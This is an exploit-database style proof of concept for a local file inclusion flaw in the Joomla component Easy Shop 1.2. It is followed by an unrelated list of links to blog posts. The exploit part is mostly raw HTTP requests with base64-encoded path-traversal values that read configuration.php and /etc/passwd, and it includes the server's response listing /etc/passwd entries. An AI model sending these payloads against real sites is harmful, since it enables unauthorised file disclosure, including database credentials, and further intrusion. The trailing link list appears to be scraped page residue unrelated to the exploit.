# Exploit Title: Joomla! Component Easy Shop 1.2. - Local File Inclusion

# Dork: N/A

# Date: --

# Exploit Author: Ihsan Sencan

# Vendor Homepage: https://joomtech.net/

# Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7bafaa65995fb3b1383328105df1e10f

# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/shopping-cart/easy-shop/

# Version: 1.2.

# Category: Webapps

# Tested on: WiN7_x64/KaLiLinuX_x64

# CVE: N/A

# POC:

# )

# http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME]

# 

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA= HTTP/1.1

GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1

Host: TARGET

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/ Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Cookie: __cfduid=d11dd4447c0b8ef3cd8c4f6745ebdf50e1548111108; 6eecafb7a7a944789bd299deac1ff945=osde04ob1pgq9o3p8arfqtbobk

DNT: 1

Connection: keep-alive

Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK

Date: Mon, 21 Jan 2019 23:58:02 GMT

Content-Type: text/plain;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Expect-CT: max-age=604800, report-uri="http://localhost/[PATH]/"

Server: cloudflare

CF-RAY: 49cd621bce8f537e-LAX

Content-Encoding: br

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

....

[EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion的更多相关文章

  1. [EXP]McAfee ePO 5.9.1 - Registered Executable Local Access Bypass

    # Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass # Date: 2019-03-07 # Exp ...

  2. Kali linux 2016.2(Rolling)中的Exploits模块详解

    简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序. root@kali:~# msfconsole Unable to handle kernel NULL pointer der ...

  3. The Honeynet ProjectThe Honeynet Project

    catalogue . 蜜罐基本概念 . Kippo: SSH低交互蜜罐安装.使用 . Dionaea: 低交互式蜜罐框架部署 . Thug . Amun malware honeypots . Gl ...

  4. metasploit--exploit模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  5. 应用安全 - CMS - vBulletin漏洞汇总

    SSV-15384 Date: 2004.11 漏洞类别: SQL 注入 SSV-15476 Date: 2005.2 漏洞类别: RCE SSV-15482 Date: 2005.2 类型: RCE ...

  6. Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

    Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques Jan 04, 2017, Vers ...

  7. Metasploit辅助模块

    msf > show auxiliary Auxiliary ========= Name                                                  Di ...

  8. python安全编程

    ##入门 这将是第一个一系列关于python编程的博客文章.python是一门非常强大的语言,因为它有信息安全社区的支撑.这意味着很多工具都是由python编写并且可以在脚本中调用很多模块.使用模块的 ...

  9. ha-wordy-Write-up

    信息收集 下载地址:点我 bilibili:点我 ➜ ~ nmap -sn 192.168.116.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 20 ...

随机推荐

  1. yum方面的知识

    修改CentOS默认yum源为国内yum镜像源 1.mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bac ...

  2. Jenkins之定时任务

    H的用法: H 10 * * *  ,这里H不是小时的意思,符号H(代表“Hash”,后面用“散列”代替) 符号H 在一定范围内可被认为是一个随机值,但实际上它是任务名称的一个散列而不是随机函数,每个 ...

  3. nginx_server_location对客户资源的辨别规则

    语法:location [ = | ~ | ~* | ^~ ] uri { …一组命令… } http://nginx.org/en/docs/http/ngx_http_core_module.ht ...

  4. mysql修改删除You can't specify target table for update in FROM clause的问题

    表中出现重复数据,需要删除重复数据,只保留一条 DELETE FROM crm_participant WHERE id IN ( SELECT c.id cid FROM crm_participa ...

  5. nignx知识点总结

    https://segmentfault.com/a/1190000013781162

  6. 114. Flatten Binary Tree to Linked List 把二叉树变成链表

    [抄题]: Given a binary tree, flatten it to a linked list in-place. For example, given the following tr ...

  7. Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.

    Error starting ApplicationContext. To display the conditions report re-run your application with 'de ...

  8. win10 使用tsmmc.msc 提示无法创建管理单元

    win10下面直接使用tsmmc.msc,会"提示无法创建管理单元",之前刚装的win10的时候,解决过一次,但昨天系统更新,打过补丁后,又不能用了. 网上的大部份解决办法,如注册 ...

  9. Docker Hello World

    Docker 允许你在容器内运行应用程序,使用docker run命令来在容器内运行一个个应用程序. 输出Hello World docker run ubuntu:15.10 ./bin/echo ...

  10. .net 简单任务调度平台安装简要说明

    .net 简单任务调度平台,用于.net dll,exe的任务的挂载,任务的隔离,调度执行,访问权限控制,监控,管理,日志,错误预警,性能分析等. 平台基于quartz.net进行任务调度功能开发,采 ...